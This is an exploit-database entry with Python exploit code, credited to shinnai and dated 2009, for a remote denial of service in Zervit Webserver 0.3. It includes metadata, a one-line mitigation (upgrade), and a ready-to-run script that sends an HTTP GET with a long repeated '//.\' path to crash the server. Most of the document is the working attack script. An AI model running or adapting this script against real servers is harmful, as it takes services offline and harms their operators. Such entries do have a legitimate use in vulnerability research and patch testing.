Zervit Webserver 0.3 Remote Denial Of Service

vendor:

Zervit Webserver

by:

shinnai

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Zervit Webserver

Affected Version From: 0.3

Affected Version To: 0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:zervit:zervit_webserver

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Zervit Webserver 0.3 Remote Denial Of Service

This exploit is for Zervit Webserver 0.3. It sends a malicious request with 330 '//.' characters to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of Zervit Webserver.

Source

Exploit-DB raw data:

import socket
import sys

print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service        "
print " url: http://zervit.sourceforge.net                   "
print "                                                      "
print " author: shinnai                                      "
print " mail: shinnai[at]autistici[dot]org                   "
print " site: http://www.shinnai.net                         "
print "                                                      "
print " greets to: e.wiZz! for inspiration. Be safe man...   "
print "                                                      "
print " dedicated to: all those tried to own my site :-p     "
print "------------------------------------------------------"

host = "127.0.0.1"
port = 80

try:
       buff = "//.\\" * 330
       request =  "GET " + buff + " HTTP/1.0"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       raw_input('\n\nExploit completed. Press "Enter" to quit...')
       sys.exit
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')

# milw0rm.com [2009-04-21]